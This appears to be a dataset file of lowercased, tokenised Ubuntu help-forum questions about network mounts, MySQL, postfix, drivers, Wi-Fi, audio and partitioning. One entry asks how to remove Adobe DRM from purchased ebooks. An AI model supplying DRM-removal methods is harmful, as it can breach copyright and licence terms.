461343	mounting a network folder on a local computer	i 'm trying to mount a folder from a different computer as a local mount on mine . both mine and the other computer ( our home server ) are ubuntu , both running 14.04 . the folder i want to mount locally is on disk 3 , called theatre ( inside another folder also called theatre ) and it 's mounted in the /mnt/ folder , so the path to it is ~/mnt/theatre/theatre/ , the network address of the server is 192.168.2.15 . i 'm trying to mount the folder locally inside the videos folder so that path is /home/peter/videos . so far i 've tried : $ sudo mount cifs//192.168.2.15/mnt/theatre/theatre /home/peter/videos mount : special device cifs//192.168.2.15/mnt/theatre/theatre does not exist i 've also tried : $ sudo mount //192.168.2.15/mnt/theatre/theatre /home/peter/videos password for root @ //192.168.2.15/mnt/theatre/theatre : retrying with upper case share name mount error ( 6 ) : no such device or address and : $ blkid /dev/sda1 : uuid= '' c88ee187-d2b5-406f-90ed-e8ff3075ace1 '' type= '' ext4 '' /dev/sda5 : uuid= '' b1bc3038-14d8-4752-b494-70a42e3e3b05 '' type= '' swap '' /dev/sdb1 : label= '' disk 1 '' uuid= '' 50ee-3b7a '' type= '' vfat '' /dev/sdc1 : label= '' disk 2 '' uuid= '' 7780-4603 '' type= '' vfat '' /dev/sdd1 : label= '' disk 3 '' uuid= '' 8d70789a-19a7-4aae-8f0c-2f93a7e172e2 '' type= '' ext3 '' any help would be appreciated .
461348	compiling the mysql_fdw for postgresql ?	i 'm attempting to compile the mysql foreign data wrapper for postgresql 9.1+ , on ubuntu 12.04 lts and having a fair bit of trouble getting it to work . so far i 've managed to use git to download the source from github , and based on the instructions add the following to my /etc/profile path in the hopes that this thing will compile : # ^ the rest of the file ^ # postgresql environment vars export pgdata= '' /usr/local/pgsql/data '' export pghost= '' localhost '' export pgport= '' 5432 '' export pglog= '' /var/log/pgsql '' export path= $ path : /usr/lib/postgresql/9.1/bin : /opt/lampp/bin i then per the documentation i ran $ make use_pgxs=1 gcc -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security -werror=format-security -fpic -dlinux_oom_adj=0 -wall -wmissing-prototypes -wpointer-arith -wdeclaration-after-statement -wendif-labels -wformat-security -fno-strict-aliasing -fwrapv -fexcess-precision=standard -g -fpic -i/usr/include/mysql -i . -i . -i/usr/include/postgresql/9.1/server -i/usr/include/postgresql/internal -d_fortify_source=2 -d_gnu_source -i/usr/include/libxml2 -i/usr/include/tcl8.5 -c -o mysql_fdw.o mysql_fdw.c mysql_fdw.c : in function ‘mysqlplanforeignscan’ : mysql_fdw.c:467:8 : warning : ‘rows’ may be used uninitialized in this function [ -wuninitialized ] gcc -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security -werror=format-security -fpic -dlinux_oom_adj=0 -wall -wmissing-prototypes -wpointer-arith -wdeclaration-after-statement -wendif-labels -wformat-security -fno-strict-aliasing -fwrapv -fexcess-precision=standard -g -fpic -shared -o mysql_fdw.so mysql_fdw.o -l/usr/lib -wl , -bsymbolic-functions -wl , -z , relro -wl , -- as-needed -wl , -z , now -l/usr/lib/i386-linux-gnu -wl , -- as-needed -l/usr/lib/i386-linux-gnu -lmysqlclient -lpthread -lz -lm -lrt -ldl and aside from the warning i suppose it compiled ok ... next i tried to install it , and i get a couple of errors about some missing files ... $ sudo make use_pgpx=1 install makefile:35 : ../../src/makefile.global : no such file or directory makefile:36 : /contrib/contrib-global.mk : no such file or directory make : *** no rule to make target `/contrib/contrib-global.mk ' . stop . do i need to compile all of postgres and include this extension in the source ? because the sources seem to be referring to a directory above the one that i 'm in .
461350	error changing mysql data directory	i was trying to change the mysql data directory following these instructions . when i try to restart the database with step 8 : sudo /etc/init.d/mysql restart gets the following errror : rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service mysql restart since the script you are attempting to invoke has been converted to an upstart job , you may also use the stop ( 8 ) and then start ( 8 ) utilities , e.g . stop mysql ; start mysql . the restart ( 8 ) utility is also available . start : job failed to start when i try to start the database with : service mysql start i get the following error message : start : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.71 '' ( uid=1000 pid=3703 comm= '' start mysql `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) after trying sudo mysql start i get ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 )
461354	postfix header_checks for redirect not working	i am trying to use postfix header_checks to [ redirect/prepend/reject/anything ] incoming email with a spamassassin score of > = 5 . i can run postmap -q - regexp : /etc/postfix/header_checks on email messages and it catches what i would expect ( messages with spam level > 5 ) ; however , nothing is happening to incoming email . this is /etc/postfix/header_checks /x-spam-level : \s*\* { 5 , } / redirect spamtesting @ mydomain.com here is the output of postconf -n : alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases append_dot_mydomain = no biff = no broken_sasl_auth_clients = yes config_directory = /etc/postfix header_checks = regexp : /etc/postfix/header_checks inet_interfaces = all mailbox_size_limit = 0 milter_default_action = accept milter_protocol = 2 mydestination = localhost myhostname = emaproduction.mydomain.com mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 myorigin = /etc/mailname non_smtpd_milters = inet : localhost:8891 readme_directory = no recipient_delimiter = + relayhost = smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) smtpd_milters = inet : localhost:8891 smtpd_relay_restrictions = permit_sasl_authenticated permit_mynetworks reject_unauth_destination smtpd_sasl_auth_enable = yes smtpd_sasl_path = private/auth smtpd_sasl_type = dovecot smtpd_tls_auth_only = yes smtpd_tls_cert_file = /etc/ssl/certs/dovecot.pem smtpd_tls_key_file = /etc/ssl/private/dovecot.pem smtpd_use_tls = yes virtual_alias_maps = mysql : /etc/postfix/mysql-virtual-alias-maps.cf virtual_mailbox_domains = mysql : /etc/postfix/mysql-virtual-mailbox-domains.cf virtual_mailbox_maps = mysql : /etc/postfix/mysql-virtual-mailbox-maps.cf virtual_transport = lmtp : unix : private/dovecot-lmtp within the logs i see the message going through postfix and then a line similar to this : relay=spamassassin , delay=0.76 , delays=0.25/0.01/0/0.5 , dsn=2.0.0 , status=sent ( delivered via spamassassin service ) here is the full output of the logs surrounding one of the messages in question : /var/log/mail.log may 6 09:27:40 emaproduction postfix/smtpd [ 10044 ] : connect from mail-wi0-f182.google.com [ 209.85.212.182 ] may 6 09:27:41 emaproduction postfix/smtpd [ 10044 ] : 5796f2e2af : client=mail-wi0-f182.google.com [ 209.85.212.182 ] may 6 09:27:41 emaproduction postfix/cleanup [ 10085 ] : 5796f2e2af : message-id= < cakio3cju_5vf7-j_ -- -edited-out -- -- oi3iuspq_nsobskj0q @ mail.gmail.com > may 6 09:27:41 emaproduction opendkim [ 19408 ] : 5796f2e2af : mail-wi0-f182.google.com [ 209.85.212.182 ] not internal may 6 09:27:41 emaproduction opendkim [ 19408 ] : 5796f2e2af : not authenticated may 6 09:27:41 emaproduction opendkim [ 19408 ] : 5796f2e2af : no signature data may 6 09:27:41 emaproduction postfix/qmgr [ 9847 ] : 5796f2e2af : from= < chris @ myotherdomain.com > , size=2016 , nrcpt=1 ( queue active ) may 6 09:27:41 emaproduction postfix/smtpd [ 10044 ] : disconnect from mail-wi0-f182.google.com [ 209.85.212.182 ] may 6 09:27:43 emaproduction postfix/pickup [ 9846 ] : 0abdf2e895 : uid=5001 from= < chris @ myotherdomain.com > may 6 09:27:43 emaproduction postfix/pipe [ 10023 ] : 5796f2e2af : to= < chris.rockwell @ mydomain.com > , relay=spamassassin , delay=1.8 , delays=0.24/0/0/1.5 , dsn=2.0.0 , status=sent ( delivered via spamassassin service ) may 6 09:27:43 emaproduction postfix/qmgr [ 9847 ] : 5796f2e2af : removed may 6 09:27:43 emaproduction postfix/cleanup [ 10047 ] : 0abdf2e895 : message-id= < cakio3cju_5vf7-j_ -- -edited-out -- -- -oi3iuspq_nsobskj0q @ mail.gmail.com > may 6 09:27:43 emaproduction opendkim [ 19408 ] : 0abdf2e895 : no signing table match for 'chris @ myotherdomain.com ' may 6 09:27:43 emaproduction opendkim [ 19408 ] : 0abdf2e895 : no signature data may 6 09:27:43 emaproduction postfix/qmgr [ 9847 ] : 0abdf2e895 : from= < chris @ myotherdomain.com > , size=2429 , nrcpt=1 ( queue active ) may 6 09:27:43 emaproduction postfix/lmtp [ 10028 ] : 0abdf2e895 : to= < chris.rockwell @ mydomain.com > , relay=emaproduction.mydomain.com [ private/dovecot-lmtp ] , delay=0.03 , delays=0.01/0/0/0.01 , dsn=2.0.0 , status=sent ( 250 2.0.0 < chris.rockwell @ mydomain.com > yeeya0/jafo2jwaal7a4mg saved ) may 6 09:27:43 emaproduction postfix/qmgr [ 9847 ] : 0abdf2e895 : removed at first i thought this indicated spamassassin was between postfix and dovecot ; however , it appears that postfix receives the message back from spamassassin and then sends it on . we ended up testing this with a non-spamassassin related header ( return-path ) to see if that worked , but still nothing happens . this leads me to believe i 'm missing a configuration option that enables header checks , beyond simply including header_checks = regexp : /etc/postfix/header_checks in main.cf . here is the output of postconf -m ( the master.cf file ) smtp inet n - - - - smtpd -o content_filter=spamassassin submission inet n - - - - smtpd -o smtpd_sasl_auth_enable=yes -o smtpd_relay_restrictions=permit_sasl_authenticated , permit_mynetworks , reject_unauth_destination smtps inet n - n - - smtpd -o smtpd_sasl_auth_enable=yes -o smtpd_relay_restrictions=permit_sasl_authenticated , permit_mynetworks , reject_unauth_destination pickup unix n - - 60 1 pickup pickup fifo n - - 60 1 pickup -o content_filter= -o receive_override_options=no_header_body_checks cleanup unix n - - - 0 cleanup qmgr unix n - n 300 1 qmgr tlsmgr unix - - - 1000 ? 1 tlsmgr rewrite unix - - - - - trivial-rewrite bounce unix - - - - 0 bounce defer unix - - - - 0 bounce trace unix - - - - 0 bounce verify unix - - - - 1 verify flush unix n - - 1000 ? 0 flush proxymap unix - - n - - proxymap proxywrite unix - - n - 1 proxymap smtp unix - - - - - smtp relay unix - - - - - smtp showq unix n - - - - showq error unix - - - - - error retry unix - - - - - error discard unix - - - - - discard local unix - n n - - local virtual unix - n n - - virtual lmtp unix - - - - - lmtp anvil unix - - - - 1 anvil scache unix - - - - 1 scache maildrop unix - n n - - pipe flags=drhu user=vmail argv=/usr/bin/maildrop -d $ { recipient } uucp unix - n n - - pipe flags=fqhu user=uucp argv=uux -r -n -z -a $ sender - $ nexthop ! rmail ( $ recipient ) ifmail unix - n n - - pipe flags=f user=ftn argv=/usr/lib/ifmail/ifmail -r $ nexthop ( $ recipient ) bsmtp unix - n n - - pipe flags=fq . user=bsmtp argv=/usr/lib/bsmtp/bsmtp -t $ nexthop -f $ sender $ recipient scalemail-backend unix - n n - 2 pipe flags=r user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store $ { nexthop } $ { user } $ { extension } mailman unix - n n - - pipe flags=fr user=list argv=/usr/lib/mailman/bin/postfix-to-mailman.py $ { nexthop } $ { user } smtp-amavis unix - - - - 2 smtp -o smtp_data_done_timeout=1200 -o smtp_send_xforward_command=yes -o disable_dns_lookups=yes -o max_use=20 127.0.0.1:10025 inet n - - - - smtpd -o content_filter= -o local_recipient_maps= -o relay_recipient_maps= -o smtpd_restriction_classes= -o smtpd_delay_reject=no -o smtpd_client_restrictions=permit_mynetworks , reject -o smtpd_helo_restrictions= -o smtpd_sender_restrictions= -o smtpd_recipient_restrictions=permit_mynetworks , reject -o smtpd_data_restrictions=reject_unauth_pipelining -o smtpd_end_of_data_restrictions= -o mynetworks=127.0.0.0/8 -o smtpd_error_sleep_time=0 -o smtpd_soft_error_limit=1001 -o smtpd_hard_error_limit=1000 -o smtpd_client_connection_count_limit=0 -o smtpd_client_connection_rate_limit=0 -o receive_override_options=no_header_body_checks , no_unknown_recipient_checks spamassassin unix - n n - - pipe user=spamd argv=/usr/bin/spamc -f -e /usr/sbin/sendmail -oi -f $ { sender } $ { recipient }
461355	airlink101 model # awll6075 finds network but drops packets in ubuntu 12.10	i 'm running ubuntu 12.10 , 32-bit , and trying to get hooked up to wireless ( i 've been using ethernet until now , and it 's no longer possible where i am living ) . i could try to set up a router with dd-wrt as an access point if i have to , but i already have an airlink101 golden n ( model awll6075 ) dongle and would rather use that if possible . ubuntu finds it okay , and it finds the network okay , and when i enter the password it tells me i 've connected to the network - but nothing loads . chrome just gives me `` unable to connect to the internet '' or `` this website is unavailable , '' and when i do ifconfig , it shows a lot of packet loss . what do i do ? is it a driver issue ( i 'm using whatever ubuntu came with ) ? or something else ? other devices in the house work fine . partial ifconfig : wlan0 link encap : ethernet hwaddr 00:21:2f:35:6d:2f inet addr:192.168.1.29 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :221:2fff : fe35:6d2f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:39469 errors:0 dropped:445553 overruns:0 frame:0 tx packets:34526 errors:0 dropped:1014 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:27667361 ( 27.6 mb ) tx bytes:7729976 ( 7.7 mb ) it eventually started `` working , '' but still drops a lot of packets and stops working sporadically .
461358	apache shows empty index of even though there are files in /var/www/	even though i have files placed in my var/www/ folder and apache2 is running , i do n't get any files listed . also i ca n't access any files directly and inserting an index.html file does nothing . i 'm on trusty 64
461362	inactive enable wi-fi	i did some changes on my wi-fi connection to give ip manual and somethings else i do not remember what exactly i did and now wi-fi connection is not enable on the menu bar i set my connection again to dhcp but also i do not have any wireless access point . in that bar beside the time on the above there is **enable wi-fi **which is inactive update : i did jgrocha 's steps . after that i saw . . phy0 : wireless lan soft blocked : no hard blocked : yes . . i follow link and my problem solved
461365	install ubuntu into multi partioned in single hard disk	my laptop has 3 primary partition and 1 logical partition ( which is common share among the 3 primary partition ) . 1st partition is with windows 7 , 2nd with windows 8 and i intend to install 3rd with ubuntu . i have a boot menu ( using boot-us boot manager ) to show this 3 partition separately when i switch on my laptop . 1 ) please advise me the steps how to install ubuntu into 3rd partition on only without damaging any of my other partition ( e.g . 1st , 2nd and logical partition to be intact ) . 2 ) how do i change or fix the mac address ( to a new one ) in ubuntu ( via menu or command line ) ? thanks in advance saha
461366	rounded window corners with themes not working	i am trying to use themes on ubuntu ( 14.04 ) unity and i am having some issues with that themes are not looking like they are supposed to look . here is a screenshot : notice that the top bar of the window does not have rounded corners and that the menu bar menus look odd . what could be the problem ?
461367	boot directory cleared , how do i restore it ?	during some development process that involves a lot of bootstrapping and so on , somehow i noticed my /boot directory got cleared out entirely . how do i restore it ? i have n't rebooted yet and obviously am reluctant to do so .
461368	recovering files from earlier but lost windows 8 partion	i may be repeating the same topics here . but i am not sure where to begin . please help with the details below : i had windows 8.1 pro with partitions : c : , d : and e : . i installed ubuntu 14.04 lts by selecting the option of replacing windows . now i am not sure if all the data in d and e drives are still recoverable . the disk utility shows : -- http : //i.cubeupload.com/rqazd6.png please let me know if i can begin recovering using the guides provided in other similar topics . for this , i just bought a 1 tb external hard drive .
461373	is there a way to see the commands that would be executed based on /etc/network/interfaces stanzas ?	the stanzas in /etc/network/interfaces translate to certain commands to bring up or down an interface and configure it . is there a way to see which commands it translates to ( similar to set -x in a bash script ) during runtime or , better yet , without actually invoking the respective commands . i know that the way this translates to commands differs across versions of ubuntu ( and also debian ) . so it would be interesting to find out for educational purposes , pure curiosity and of course to have those commands handy when you need/want to invoke them manually .
461376	can install ubuntu for all android tablets , i have prestigio duo	can i install ubuntu on my tablet , prestigo duo ?
461379	how can i remove unity icons that launch nothing ?	i have a problem involving shortcuts in the dash . when i click one , it launches nothing . how can i remove these useless shortcuts ?
461381	keep backing up ( copying ) the same file to a new folder	i am saving a stream in my hdd . i 'd like to copy the file periodically into a subfolder backup such that the older versions of the the file are not deleted . simply put assume the original file is somefolder/data . the first backup should be somefolder/backup/data.1 the second backup should be somefolder/backup/data.2 this process should continue in an interval of t minutes/seconds how do i go about doing this ?
461384	how to connect to wifi from lubuntu ?	after add the manage networks icon into the panel , i can see my wi-fi network on the list . so i click on the ssid and it prompt for a password . i enter the right or wrong password but nothing happens . the access point is working fine , i have others devices connected to it working properly . i 've tried to compile the rtl8191se driver but they have syntax errors . more information : lsmod dmesg | tail -n 30 $ uname -a linux lucio-net 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux $ lspci -nn | grep 0280 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8191sevb wireless lan controller [ 10ec:8172 ] ( rev 10 ) $ nmcli d device type state wlan0 802-11-wireless disconnected $ nm-tool networkmanager tool state : disconnected - device : wlan0 type : 802.11 wifi driver : rtl8192se state : disconnected default : no capabilities : wireless properties wep encryption : yes wap encryption : yes wap2 encryption : yes wireless access points [ ssid ] : infra , [ mac ] , freq 2462 mhz , rate 54 mb/s , strength 100 wpa wpa2
461388	allegro4 and allegro5 dev seems to not want to install together	installing via synapic on a new ubuntu 14.04 lts , the allegro 4 and 5 development packages ubuntu seem to act as if mutually exclusive and give me an exclamation point saying that one will need to be uninstalled for the other . is this the case for other people , and if so can this be fixed ? should i install via source like i normally do ? i was just really happy to see allegro 4 and 5 in the ubuntu repos . this is normal behavior for most libraries which have upgrades , but is not necessary ( and detrimental ) for allegro , for which allegro 4 and allegro 5 are nearly as similar as opengl is to openssl from the computers point of view . this is because there was an entire rewrite between 4 and 5 and there is no expected compatibility . that said installed allegro4-dev should probably point out that alleg5-dev would be better as the allegro project community has all but moved on , save for projects that will not be re-written . packages possibly affected : liballegro4-dev liballegro5-dev if other people have this issue too , a bug-report will have to be filed . otherwise , i am just looking for the solution to allowing both without breaking my package manager .
461389	xinput not working for changing touchscreen 's coordinate transformation matrix	i 'm running ubuntu 12.04 lts and am trying to get my touchscreen to be calibrated . i attached the touchscreen to my laptop and if i extend my desktop the touchscreen 's x coordinate gets mapped across both screens ( i.e . tapping in the middle of the touchscreen shows up at the right edge of the touchscreen ) . i used mtview to verify this . i tried changing the coordinate transformation matrix via xinput : xinput set-prop `` 3m 3m microtouch usb controller '' -- type=float `` coordinate transformation matrix '' 0.5 0 0 0 1 0 0 0 1 but this does not seem to affect the coordinates in anyway . i saw this post http : //askubuntu.com/a/300075 and tried downloading and installing xf86-input-evdev-2.8.3.tar.gz , but there 's still no effect ( i did run `` sudo make install '' ) . any ideas ? update : if i mirror my screens , mtview works successfully , but other applications seem to be getting the new `` coordinate transformation matrix '' ( which of course is now not correct with mirrored views , so i had to change it back to 1 0 0 0 1 0 0 0 1 ) . so maybe mtview is doing something weird ? ?
461391	how to make audio work on old laptop ?	i 'm trying to make a working install of ubuntu 14.04 on a toshiba satellite u200 . ubuntu is running pretty well , except there is absolutely no audio . i have already followed all the advice in the sound troubleshooting page , and the results were : i checked the audio settings tons of times : it is not muted , and the volume is at 100 % . i can see the indicator on the panel and it seems active and not muted . the sink is listed if i use pacmd and the list-sinks command . however the output is the following : $ pacmd welcome to pulseaudio ! use `` help '' for usage information . > > > list-sinks 1 sink ( s ) available . * index : 0 name : < alsa_output.pci-0000_00_1b.0.analog-stereo > driver : < module-alsa-card.c > flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency dynamic_latency state : suspended suspend cause : idle priority : 9959 volume : 0 : 153 % 1 : 153 % 0 : 11,00 db 1 : 11,00 db balance 0,00 base volume : 89 % -3,00 db volume steps : 65537 muted : no current latency : 0,00 ms max request : 0 kib max rewind : 0 kib [ ... ] used by : 0 linked by : 0 configured latency : 0,00 ms ; range is 0,50 .. 341,33 ms card : 0 < alsa_card.pci-0000_00_1b.0 > module : 5 properties : [ ... ] alsa.name = `` ad1981 analog '' alsa.id = `` ad1981 analog '' [ ... ] alsa.long_card_name = `` hda intel at 0x44080000 irq 43 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 27d8 '' device.product.name = `` nm10/ich7 family high definition audio controller '' [ ... ] module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : analog-output-speaker : altoparlanti ( priority 10000 , latency offset 0 usec , available : unknown ) properties : device.icon_name = `` audio-speakers '' analog-output-headphones : cuffie analogiche ( priority 9000 , latency offset 0 usec , available : no ) properties : device.icon_name = `` audio-headphones '' active port : < analog-output-speaker > i do n't really like the state : suspended , nor the used by : 0 , linked by : 0 and , at the end , available : unknown , however i 'm not really sure what all this output means . when playing the test sounds i do n't hear anything , even when using sudo . the user was n't in the audio group , i have added the user to the group and nothing changed . i tried to log in the guest session , but the audio does n't work either . the sound card is recognize by ubuntu and aplay -l does show it . find /lib/modules/uname -r| grep snd does find tons of modules , so the drivers seem to be there . output of lspci : $ lspci -v | grep -a7 -i `` audio '' 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) subsystem : toshiba america info systems device 0001 flags : bus master , fast devsel , latency 0 , irq 43 memory at 44080000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel $ sudo lspci -v | grep -a7 -i `` audio '' 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) subsystem : toshiba america info systems device 0001 flags : bus master , fast devsel , latency 0 , irq 43 memory at 44080000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 capabilities : [ 60 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 70 ] express root complex integrated endpoint , msi 00 capabilities : [ 100 ] virtual channel i do n't understand whether the sound card is supported . i can see ich7 in the intel list , but i can not find nm10/ich7 . also it seems like ich7 devices use the snd-intel8x0 driver , which i have : $ find /lib/modules/`uname -r` | grep snd-intel8x0 /lib/modules/3.13.0-24-generic/kernel/sound/pci/snd-intel8x0.ko /lib/modules/3.13.0-24-generic/kernel/sound/pci/snd-intel8x0m.ko does somebody know how to fix this issue ? on this page it is me tioned that on some toshiba laptops not muting headphones may sometimes automatically mute the master volume . i have tried a lot of combinations of mute/unmute the various channels but nothing worked . later on the same page suggest doing : $ sudo iecset audio on and i get the following response : control `` iec958 playback default '' ( index -1 ) not found i do n't whether this might be useful , but the internal microphone works perfectly . i can record sound but i 'm unable to play it . i just noticed that when doing alsa force-reload , it says that it fails to unload some modules : $ sudo alsa force-reload unloading alsa sound driver modules : snd-seq-midi snd-seq-midi-event snd-seq snd-rawmidi snd-seq-device snd-hda-codec-si3054 snd-hda-codec-analog snd-hda-intel snd-hda-codec snd-hwdep snd-pcm snd-page-alloc snd-timer ( failed : modules still loaded : snd-hda-codec-si3054 snd-hda-codec-analog snd-hda-intel snd-hda-codec snd-hwdep snd-pcm snd-page-alloc snd-timer ) . loading alsa sound driver modules : snd-seq-midi snd-seq-midi-event snd-seq snd-rawmidi snd-seq-device snd-hda-codec-si3054 snd-hda-codec-analog snd-hda-intel snd-hda-codec snd-hwdep snd-pcm snd-page-alloc snd-timer . $ echo $ ? 1
461394	how to partition ssd+hdd ?	i have installed ubuntu 14.04 on 1tb hdd and have installed lots of packages and softwares . now i 've bought an 128gb ssd , i have few questions on how to partition ssd and hdd and how to move my current installation to ssd . i 'm thinking to have / and /home on ssd , and store other files on hdd , so how can i partition ssd+hdd to have : / and /home on ssd have /home/music , /home/videos , /home/downloads , /home/pictures on hdd i have no idea about swap partition ( should it be on ssd or hdd , actually its empty most of the time now ) , my laptop has 16 gbs of ram i 'm planning to have fresh install of 14.04 on ssd ( and i think i have to ) , so what is the best way to move currently installed packages to new installation ? i 'm planning to use aptik for that , is there a better solution ? is preload any good and gives performance boost when using ssd ( i have 16 gbs of ram )
461395	installation with grub on usb and root on hard disk	i tried to install ubuntu 32 bit in the following way : on a hard disk , i have two partitions , one ext4 with / as the mount point ( 300 gb ) and a swap partition with 4 gb . i told the installer to install grub on a usb stick ( 12 gb fat32 partition ) in the first attempt , when rebooting i got the error message attempt to read or write outside of disk 'hd2 ' , which is the usb stick i guess . in the second attempt , even the installation of grub failed . what did i wrong ? my system is a dell inspiron 6000 , and i 'd like to maintain simple windows boot with the built-in hard disk . i installed a second hd in the dvd bay , and my idea was to boot from that hd with grub on a usb stick . when i remove the stick , the system will boot windows without loading grub at all .
461398	start the rsync daemon to synchronize a directory between two servers	i want to synchronize a directory on the server a to a server b . on the server a i created a file rsyncd.conf with the content : uid = rsync gid = rsync use chroot = no pid file = /var/run/rsyncd.pid [ share ] comment = share path = /etc/dirtosync read only = false list = yes hosts allow = * auth users = rsync secrets file = /etc/rsyncd.secrets and i created on the server a the file /etc/rsyncd.secrets with the content : rsync : rsync i also created on the server a the pid file , and the user rsync with the password rsync . on the server a , on the file : /etc/default/rsync i put the value rsync_enable to true and i started the rsync daemon with the command : /etc/initd/rsync start on the server a and the server b the owner and the group of the directory is rsync . i launched on the machine b the command : rsync -avzr rsync @ : /etc/dirtosync/* /etc/dirtosync/ i also tried on the server a the command rsync -avzr /etc/dirtosync/* rsync @ : /etc/dirtosync/ with this two commands the result is the same : the files are synchronized just one time when i launch the command but after if i modify the files in the server a they are n't synchronize to the server b do i have to do something else to keep the file synchronized ? thank you for your help and sorry for my english ,
461399	catalyst 14.4 libc6-amd problem	i got a problem while installing new catalyst 14.4 on ubuntu 14.04 . if i try to run the .run file everything goes well , but after reboot , unity does n't start . i tried to build debs for the distro , and tried to install them with : sudo dpkg -i *.deb and got this problem : preparing to unpack fglrx_14.100-0ubuntu1_amd64.deb ... unpacking fglrx ( 2:14.100-0ubuntu1 ) ... selecting previously unselected package fglrx-amdcccle . preparing to unpack fglrx-amdcccle_14.100-0ubuntu1_amd64.deb ... unpacking fglrx-amdcccle ( 2:14.100-0ubuntu1 ) ... selecting previously unselected package fglrx-dev . preparing to unpack fglrx-dev_14.100-0ubuntu1_amd64.deb ... unpacking fglrx-dev ( 2:14.100-0ubuntu1 ) ... dpkg : dependency problems prevent configuration of fglrx : fglrx depends on libc6-amd64 ( > = 2.9 ) . dpkg : error processing package fglrx ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of fglrx-amdcccle : fglrx-amdcccle depends on fglrx ; however : package fglrx is not configured yet fglrx-amdcccle depends on libc6-amd64 ( > = 2.3 ) ; however : dpkg : error processing package fglrx-amdcccle ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of fglrx-dev : fglrx-dev depends on fglrx ; however : package fglrx is not configured yet dpkg : error processing package fglrx-dev ( -- install ) : dependency problems - leaving unconfigured processing triggers for ureadahead ( 0.100.0-16 ) ... ureadahead will be reprofiled on next reboot errors were encountered while processing : fglrx fglrx-amdcccle fglrx-dev i tried some solutions but nothing works . the only thing is using the -- force-all option , but this breaks apt .
461400	unity not loading ? no taskbar , no alt-ctrl-t , just blank screen with background	new user here still trying to figure things out . i 've switched gpus and , when i did , it now wo n't load anything but the desktop background . i was able to get into a browser because i had a photo on the desktop that i opened in firefox . alt-ctrl-t does nothing . alt-ctrl-f1-7 works fine . what other information would you need from me to figure this out ?
461403	copying folder while preserving permissions/ownership error : operation not permitted	i am trying to copy a folder while preserving ownership . when i use the command : sudo cp -r -p /var/lib/mysql /newpath the files copy but the ownership changes ( my username becomes the owner on the new files ) and i get an error message saying that cp : failed to preserve ownership for '/newpath/subdirectory ' : operation not permitted for each subdirectory and file in the copied folder . trying to switch back ownership on the copied files produces the same error ( with chown in the place of cp ) . sudo chown -r username : group /newpath i am trying to copy a mysql data directory folder to my second hard drive in such a way that i can then use it as the database directory for the mysql server ( username mysql ) with webmin .
461404	trackpad causing xubuntu freeze	i have recently installed xubuntu 14.04 lts ( x64 ) onto my laptop . it works completely fine when i am using my mouse instead of the trackpad , but once i start to use the trackpad , then after a minute or so ( sometimes longer , sometimes less ) the whole system just freezes up , forcing me to reboot . it is not just the trackpad stops working - everything stops working . trackpad ( from xinput ) : `` synps/2 synaptics touchpad ''
461406	which proprietary video driver do i need for a vtk rad7k 64p graphics card ?	can anyone tell me which driver to use for video device listed in screen ? i do n't know but model number on box when i purchased card is vtkrad7k64p , my computer is running really slow . ! [ lspci ] /home/doug/desktop/ubuntu.jpg
461408	help fix swap error when waking from suspend to ram	i suspend to ram fine . i ca n't wake from ram . it always ends up in a swap error , and i have to reboot the whole computer.. why ? what info do you need from me ? please help !
461409	how can i remove the drm from an epub file ?	i 'd like to remove the drm protection from a couple of my ebooks , just for personal use ( since they are locked , i can not read them ) . they are protected by the adobe ade drm . on the internet there are many ways to get the result , but mist of them are outdated . is there a simple and effective one .
461410	why do i get this permission issue when trying to unrar a file into /media/ ?	im trying to unrar a file to the folder /media/ edit : ok , the actual folder is '/mnt/sdb1/bittorrent/readyforplex/ ' not '/media/ ' . when i run the unrar command i get an error that says `` can not create ... permission denied '' , but it does create the correctly named file with a file size of 0 . if i chmod 777 that file and re-run the unrar command it unrar 's everything just fine . if i delete everything , chmod 777 the folder and run the unrar command , i get the original error . i could really use some help here .
461411	phpmyadmin connect using computer name ?	i use phpmyadmin to connect to a remote server for windows machine . i have to use the ip address and not the computer name . is it possible to use the computer name to configure a connection to a remote computer ?
461413	rotating a log file in my home directory on ubuntu server 14.04 lts	i have a log file ircd.log in /home/irc . i want to rotate it daily at 00:00 and keep 7 days . i want the rotated log files to be saved as ircd.log.yyyymmdd for example ircd.log.20140505 . can someone please tell me the package to use and also an example configuration for it based on this ? also is it possible to store this configuration at the user level ?
461416	how to mount nexus 4 to 14.04	how do i mount my nexus 4 to my laptop running 14.04 . i need a method that mount and unmounts the nexus 4 like how windows does it . i do n't want complicated methods . thanks ! !
